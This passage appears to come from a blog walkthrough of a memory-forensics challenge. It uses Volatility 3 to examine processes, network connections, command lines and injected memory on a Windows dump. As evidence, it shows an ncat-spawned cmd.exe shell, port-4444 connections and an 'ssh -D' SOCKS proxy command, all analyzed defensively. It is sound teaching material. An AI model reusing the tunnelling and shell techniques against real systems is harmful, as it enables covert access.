From a different perspective:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ssh_logs/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.joblinks.JobLinks> job_links.txt
Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat job_links.txt | head --lines=6
Volatility 3 Framework 2.5.2
Offset(V) Name PID PPID Sess JobSess Wow64 Total Active Term JobLink Process
0xe78bf38b5080 MsMpEng.exe 4032 696 0 0 False 25 1 0 N/A (Original Process)
* 0xe78bf38b5080 MsMpEng.exe 4032 696 0 0 False 0 0 0 Yes C:\Program Files\Windows Defender\MsMpEng.exe
Q: What Database server is running on the system?
A: MySQL. This is determined from mysqld.exe.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep --ignore-case "mysql"
9044 8100 mysqld.exe 0xe78bf4fa5080 30 - 1 False 2023-11-16 23:26:13.000000 N/A Disabled
Q: What Webserver server is running on the system?
A: httpd. Apache! https://httpd.apache.org/download.cgi
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pslist.txt | grep http
10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled
5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled
Even more process information:
At first, we looked at standalone processes now let's transition this to seeing the relationship across the processes.
With a solid understanding of identifying process, let's look at least one more place.
First get the process tree information into a file:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.txt
Progress: 100.00 PDB scanning finished
Q: Which process has the most handles opened? What is the process name and process id?
A: The process is httpd.exe but there are two. However, the one with PID 5088 is what we need:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep http
**** 10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A
***** 5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A
Update: After revisiting this, it seems my grep on http was incorrect. This caught the 156 threads column not the handles. I changed my technique and instead decided to put this into a CSV file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --renderer csv --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.csv
This CSV gives a better opportunity to sort the fields. Now when I sort the fields, it seems the handles information is empty here.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.csv | awk --field-separator=',' '{ print $7 }' | sort | uniq
-
Handles
Now we can see no handles are being reported here. Let's now try to do the same thing for the pslist plugin to see if we get some data we can work with.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --renderer csv --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist | cut -f 7 -d ',' | sort | uniq
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
-
Handles
Epic failure! :-) My initial answer was 156 this is obviously wrong! Why did I not just update the blog to reflect the new material and remove the incorrect answer? Great question! One of the problems with forensics is that we need to ensure we are validating our tools and techniques. This is why we should not rely on any one tool or technique but always try other ways or have our work peer reviewed. I am leaving my mistake above, so you can see my errors as I am human just like you :-) If you see any other errors, do let me know.
Q: Starting at a count of 2 (**), which process has the largest count of children?
A: The process with the most children is svchost.exe with process id 884
The process in the previous section spawned 22 children.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+' | wc --lines
23
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+'
** 884 696 svchost.exe 0xe78bf2c90080 19 - 0 False 2023-11-16 19:09:13.000000 N/A
*** 9736 884 backgroundTask 0xe78bf61b4080 7 - 1 False 2023-11-16 23:26:04.000000 N/A
*** 2576 884 TextInputHost. 0xe78bf33c1080 21 - 1 False 2023-11-16 19:25:22.000000 N/A
*** 6804 884 RuntimeBroker. 0xe78bf4e2d080 9 - 1 False 2023-11-16 19:25:24.000000 N/A
*** 7956 884 RuntimeBroker. 0xe78bf4e1e080 2 - 1 False 2023-11-16 19:57:25.000000 N/A
*** 3224 884 dllhost.exe 0xe78bf49c2080 7 - 1 False 2023-11-16 19:25:02.000000 N/A
*** 2168 884 WidgetService. 0xe78bf48c50c0 5 - 1 False 2023-11-16 19:30:23.000000 N/A
*** 2592 884 Microsoft.Phot 0xe78bf42bf0c0 15 - 1 False 2023-11-16 19:43:56.000000 N/A
*** 10152 884 smartscreen.ex 0xe78bf707a080 6 - 1 False 2023-11-16 23:56:53.000000 N/A
*** 820 884 ApplicationFra 0xe78bf52680c0 3 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 6204 884 ShellExperienc 0xe78bf33c4080 31 - 1 False 2023-11-16 19:25:21.000000 N/A
*** 2748 884 RuntimeBroker. 0xe78bf4521080 7 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 4944 884 WmiPrvSE.exe 0xe78bf3b95080 9 - 0 False 2023-11-16 19:09:59.000000 N/A
*** 8784 884 RuntimeBroker. 0xe78bf5cc3080 6 - 1 False 2023-11-16 23:56:45.000000 N/A
*** 5080 884 RuntimeBroker. 0xe78bf59c20c0 3 - 1 False 2023-11-16 19:43:59.000000 N/A
*** 3808 884 StartMenuExper 0xe78bf44cf080 16 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1376 884 RuntimeBroker. 0xe78bf49ac080 5 - 1 False 2023-11-16 19:24:57.000000 N/A
*** 1888 884 UserOOBEBroker 0xe78bf523b080 1 - 1 False 2023-11-16 19:30:30.000000 N/A
*** 1256 884 dllhost.exe 0xe78bf5ef3080 2 - 1 False 2023-11-16 22:50:53.000000 N/A
*** 1260 884 SearchHost.exe 0xe78bf44cc080 76 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1392 884 Widgets.exe 0xe78bf48e8080 5 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 3448 884 SystemSettings 0xe78bf52350c0 20 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 10108 884 backgroundTask 0xe78bf6ed10c0 8 - 1 False 2023-11-16 23:56:44.000000 N/A
Q: Once again, starting at a count of 2 (**), which process has the largest count of grandchildren?
A: The process with the largest number of grandchildren is cmd.exe with PID 2796 which was spawned by powershell.exe with PID 644.
This process has 11 grandchildren.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+4668\s+|\s+2796\s+'
***** 2796 644 cmd.exe 0xe78bf68ce0c0 1 - 1 False 2023-11-16 21:29:22.000000 N/A
****** 4668 2796 chrome.exe 0xe78bf69ac0c0 43 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 9152 4668 chrome.exe 0xe78bf65570c0 15 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 6944 4668 chrome.exe 0xe78bf68a8080 15 - 1 False 2023-11-16 21:29:46.000000 N/A
******* 2392 4668 chrome.exe 0xe78bf658a0c0 18 - 1 False 2023-11-16 21:30:06.000000 N/A
******* 5188 4668 chrome.exe 0xe78bf6192080 15 - 1 False 2023-11-16 21:29:27.000000 N/A
******* 7364 4668 chrome.exe 0xe78bf4f60080 9 - 1 False 2023-11-16 21:29:40.000000 N/A
******* 904 4668 chrome.exe 0xe78c05e3d080 15 - 1 False 2023-11-16 21:29:49.000000 N/A
******* 7980 4668 chrome.exe 0xe78bf8e9b0c0 7 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 1356 4668 chrome.exe 0xe78bf69ce0c0 10 - 1 False 2023-11-16 21:29:25.000000 N/A
******* 8628 4668 chrome.exe 0xe78bf69680c0 17 - 1 False 2023-11-16 21:30:11.000000 N/A
******* 8696 4668 chrome.exe 0xe78bf5337080 15 - 1 False 2023-11-16 21:29:31.000000 N/A
******* 9180 4668 chrome.exe 0xe78bf3b440c0 16 - 1 False 2023-11-16 21:29:25.000000 N/A
Looking at another svchost.exe, this time with PID 1652, we see it spawned a child in ncat.exe
Q: Which process spawned ncat.exe?
A: "svchost.exe" with PID 1652
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep ncat --before-context=2
** 1652 696 svchost.exe 0xe78bf2fb1080 11 - 0 False 2023-11-16 19:09:18.000000 N/A
*** 1432 1652 taskhostw.exe 0xe78bf42a4080 8 - 1 False 2023-11-16 19:24:45.000000 N/A
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
One final piece of process information. There are times when there are remnants of processes in memory.
First up and as always, I write the information out to a file for easier and quicker processing.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.psscan.PsScan > psscan.txt
Progress: 100.00 PDB scanning finished
Do we have more processes being reported via PsScan than we saw in PsList?
Q: How many processes are reported in memory overall?
A: There are 219 processes in memory overall:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat psscan.txt | sed '1,4d' | wc --lines
219
I found it strange that this reported 219 when the psList report 220. Maybe I cut out an extra line. Always something that can be revisited.
Anyhow, moving on.
With this process information gathered, time to look at network information.
Write this information to a file:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netstat.NetStat > netstat.txt
Volatility was unable to read a requested page:nished
Page error 0x1800000028 in layer layer_name (Page Fault at entry 0x0 in table page directory)
Q: How many network connections were either in a LISTENING, ESTABLISHED OR CLOSED state at the time of this capture?
A: 50 connections
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | wc --lines
50
Q: Of those network connections found, how many were in LISTENING state?
A: 44
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN | wc --lines
44
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf274b4f0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274b4f0 TCPv6 :: 135 :: 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf00fd0d0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274a470 TCPv4 10.0.0.108 139 0.0.0.0 0 LISTENING 4 System 2023-11-16 19:09:08.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5be0 TCPv4 0.0.0.0 3306 0.0.0.0 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000
0xe78bf3af5be0 TCPv6 :: 3306 :: 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000
...
Q: Of those network connections found, how many were in "ESTABLISHED" state?
I am disappointed that we do not see the process id and name for these "ESTABLISHED" connections. We can see the PID and name for the "LISTENING" sockets, so ...
A: 4
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST | wc --lines
4
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A
Q: Of those network connections found, how many were in CLOSED state?
A: There are 2 sessions in the CLOSED states
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep CLOSED
0xe78bf69bbb00 TCPv4 127.0.0.1 9999 127.0.0.1 50369 CLOSED - - N/A
0xe78bf33adaa0 TCPv4 127.0.0.1 9999 127.0.0.1 50366 CLOSED - - N/A
At this point, we should be able to build our network map of the connections. Let us do that!
With the insights from network statistics, let's look to see if there are any remnants of connections in memory.
As always, writing the information to a file for further analysis.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netscan.NetScan > netscan.txt
Progress: 100.00 PDB scanning finished
Looking into memory we see additional connection.
Comparing the ESTABLISHED sessions ports with outputs from netscan.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netscan.txt | grep --perl-regexp '\s+4444\s+|\s+443\s+|\s+22\s+'
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa600 TCPv6 ::1 9999 :: 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000
0xe78bf2daa760 TCPv4 127.0.0.1 9999 0.0.0.0 0 LISTENING 4444 ssh.exe 2023-11-16 21:15:54.000000
0xe78bf3af4060 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
At first glance, 4444 above in the netscan ouput had me thinking this was a port. However, from the memory dump, it seems this is the PID associated with ssh.exe. Why did I mention that point?! It is important that we do not introduce our biases to our analysis/investigation. It is even more important that we recognize those biases early. At the same time, if we look at the netstat output focusing on the ESTABLISHED sessions, we see there is a port 4444. This is typically associated with Metasploit. Hence this may be a real problem for us.
Moving on.
Actually, I am very disappointed, that I did not have the PIDs, Owner, etc., for the processes that were in ESTABLISHED state via netstat. This just made this self-paced learning a bit more interesting for me.
Going back to the process tree
Q: From the process information previously reviewed, how many "suspicious" processes do you see? Why do you consider these processes as suspicious?
A: There is ncat.exe with PID 896 which spawned connhost.exe with PID 6148 and cmd.exe with PID 8724.
Ncat is known as the Swiss Army Knife and can be used for many things. It does not come installed by default on Windows.
This means, so far we have 3 suspicious processes (at least for me).
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+896\s+'
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
Q: What are the name(s) and Process ID(s) of these processes?
A: I am also concerned about process vmtoolsd.exe with PID 7164, spawning the following processes:
** cmd.exe > PID:5176
** cmd.exe > PID:5176
** cmd.exe > PID: 7072
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+'
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A
We now have another 5 processes for a total of 8 that seems to be of immediate concern to me (your perspective my differ).
I am going to close off with this final group. I see Windows Terminal is the parent or grandparent of these processes. So at first glance, while I would not consider them suspicious, I still consider them as items to be reviewed. Trust but verify!
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+'
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A
We now have a total of 18 process that I will consider as suspicious.
Q: Why do you think these processes are suspicious?
A: Now for everyone suspicion may vary. However, for this scenario these represent my starting point. I choose these primarily because of the fact that I see powershell.exe and cmd.exe along with in some cases, I'm concerned about the parent spawning these shells. For example, why is vmtoolsd.exe spawning cmd.exe. That is s a big concern. Maybe it is normal, maybe it is not. However, our job is to find out.
With the suspicious processes Identified, Let's write all those to a file so we can keep them separated from everything else and make our analysis easier and somewhat cleaner.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '896'
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '896' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+7164\s+|\s+7072\s+' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+2460\s+|\s+4728\s+' >> suspicious_processes.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ls suspicious_processes.txt
suspicious_processes.txt
With a list of suspicious processes, now we can look forward;
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat suspicious_processes.txt
*** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
**** 6148 896 conhost.exe 0xe78bf5319080 5 - 1 False 2023-11-16 22:49:12.000000 N/A
**** 8724 896 cmd.exe 0xe78bf531c080 1 - 1 True 2023-11-16 22:49:13.000000 N/A
** 5896 696 SgrmBroker.exe 0xe78bf3c9a080 7 - 0 False 2023-11-16 19:11:51.000000 N/A
*** 7164 1100 vmtoolsd.exe 0xe78bf431e080 12 - 1 False 2023-11-16 19:25:21.000000 N/A
**** 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000
**** 4940 7164 cmd.exe 0xe78bf05391c0 1 - 1 False 2023-11-16 22:12:51.000000 N/A
**** 7072 7164 cmd.exe 0xe78bf59e01c0 1 - 1 False 2023-11-16 23:01:17.000000 N/A
***** 1364 7072 conhost.exe 0xe78c05e54080 3 - 1 False 2023-11-16 23:01:17.000000 N/A
*** 2460 1100 WindowsTermina 0xe78bf4f240c0 16 - 1 False 2023-11-16 20:04:59.000000 N/A
**** 644 2460 powershell.exe 0xe78bf5287080 9 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 2692 2460 OpenConsole.ex 0xe78bf65680c0 5 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 5736 2460 OpenConsole.ex 0xe78bf3b880c0 5 - 1 False 2023-11-16 20:05:01.000000 N/A
**** 2352 2460 OpenConsole.ex 0xe78bf46eb0c0 5 - 1 False 2023-11-16 21:16:12.000000 N/A
**** 1684 2460 OpenConsole.ex 0xe78bf63380c0 5 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 4852 2460 powershell.exe 0xe78bf46770c0 9 - 1 False 2023-11-16 21:42:18.000000 N/A
**** 3032 2460 cmd.exe 0xe78bf4e2a080 1 - 1 False 2023-11-16 21:42:53.000000 N/A
**** 4728 2460 powershell.exe 0xe78bf4f900c0 10 - 1 False 2023-11-16 20:05:01.000000 N/A
***** 6152 4728 cmd.exe 0xe78bf5caf0c0 1 - 1 False 2023-11-16 20:16:37.000000 N/A
With each of the suspicious processes identified. We can go through the same process for all.
1. Get the command line
2. Get the DLLs the process was using
3. Perform a file scan
4. Attempt to dump files
5. Get the environment variables
6. Get the SIDs
7. Get the Handles
8 . Attempt to find malware in the process
9. Look at the privileges the process was running with
10. Look at the windows registry
We more than likely will not follow this pattern, but it is something you may want to do. In incident response, you pivot based on the evidence you have or encounter.
Let start with the process command lines.
Extracting all the command lines and writing them to a file:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.cmdline.CmdLine > cmdline.txt
Progress: 100.00 PDB scanning finished
Q: Looking at the processes you considered as suspicious, did you find anything interesting in the command line?
A: I did not find anything that immediately stood out. I however, added PID 4444 and 4668 to this list as we can see SSH being used to setup a "dynamic" proxy on port 9999, using username kali to connect to the host on 10.0.0.110. Remember, 10.0.0.110 is an IP address we saw above. Also, notice - "-N"? This is will not return a SSH terminal. Meaning there is no intention to authenticate and interact with this host via a terminal.
At the same time, it is not Everday, we see chrome.exe being run from the command line. This command line also ties into the ssh session at PID 4444. Looks like chrome.exe traffic is being proxied through the device at 10.0.0.110 on port 9999.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ grep --perl-regexp '896|8724|7164|5176|4940|7072|2460|644|4852|3032|4728|6152|4444|4668' cmdline.txt
5896 SgrmBroker.exe C:\Windows\system32\Sgrm\SgrmBroker.exe
7164 vmtoolsd.exe "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
2460 WindowsTermina "C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.12.10983.0_x64__8wekyb3d8bbwe\WindowsTerminal.exe"
4728 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
6152 cmd.exe Required memory at 0xb247af2020 is inaccessible (swapped)
4444 ssh.exe ssh -D 9999 kali@10.0.0.110 -N -vvv
644 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
4668 chrome.exe chrome.exe --proxy-server="socks5://127.0.0.1:9999"
4852 powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3032 cmd.exe C:\Windows\System32\cmd.exe
5176 cmd.exe Required memory at 0x62a2d2020 is not valid (process exited?)
4940 cmd.exe C:\Windows\system32\cmd.exe
896 ncat.exe Required memory at 0x846628 is inaccessible (swapped)
8724 cmd.exe Required memory at 0x2f23020 is inaccessible (swapped)
7072 cmd.exe C:\Windows\system32\cmd.exe
Having not found anything interesting in the command line of those "suspicious" processes, we might have wanted to give up. However, we did find signs of possible proxying going on.
Outside of the proxying, I am lacking enough evidence to strengthen my suspicion. Truly disappointed but this is how things go. I was really hoping to find the smoking gun(s) in the command line but that was not to be. Still sticking with my suspicious processes.
Since there was not enough meaningful information found from the command line, let's see if the malfind plugin finds anything from the processes we considered suspicious.
Malfind helps us to find malware that has been injected to or is hidden in user mode memory. malfind, helps us to detect malware that standard tools do not see. We can look at the page permissions and VAD tags for example.
There are a couple of approaches here, we can test each PID one at a time such as:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896
Or we can add multiple:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148
Let's take the last route so we can run all the PIDs through at one time. Let's start off by getting them all on one line, separated by a space:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat suspicious_processes.txt | awk --field-separator=' ' '{ print $2 }' | tr '\n' ' '
896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 6152
Using the previously generated list of PIDs, we see the following:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.malfind.Malfind --pid 896 6148 8724 5896 7164 5176 4940 7072 1364 2460 644 2692 5736 2352 1684 4852 3032 4728 615
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process Start VPN End VPN Tag Protection CommitCharge PrivateMemory File output Hexdump Disasm
7164 vmtoolsd.exe 0x1b986d60000 0x1b986d91fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b986d60000: add byte ptr [rax], al
...
7164 vmtoolsd.exe 0x1b987d90000 0x1b987dc1fff VadS PAGE_EXECUTE_READWRITE 50 1 Disabled
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
00 00 00 00 00 00 00 00 ........
0x1b987d90000: add byte ptr [rax], al
...
From above, it seems malicious code has been injected in the vmtoolds.exe process starting at memory address 0x1b986d60000 and ending at 0x1b986d91fff. We see "VadS", meaning there is no memory mapped file occuping this space.
Similarly, we see below the suspicious code in Powershell with PID 4852 at 0x7df4d16b0000
4852 powershell.exe 0x7df4d16b0000 0x7df4d16bffff VadS PAGE_EXECUTE_READWRITE 1 1 Disabled
00 00 00 00 00 00 00 00 ........
78 0d 00 00 00 00 00 00 x.......
0c 00 00 00 49 c7 c2 00 ....I...
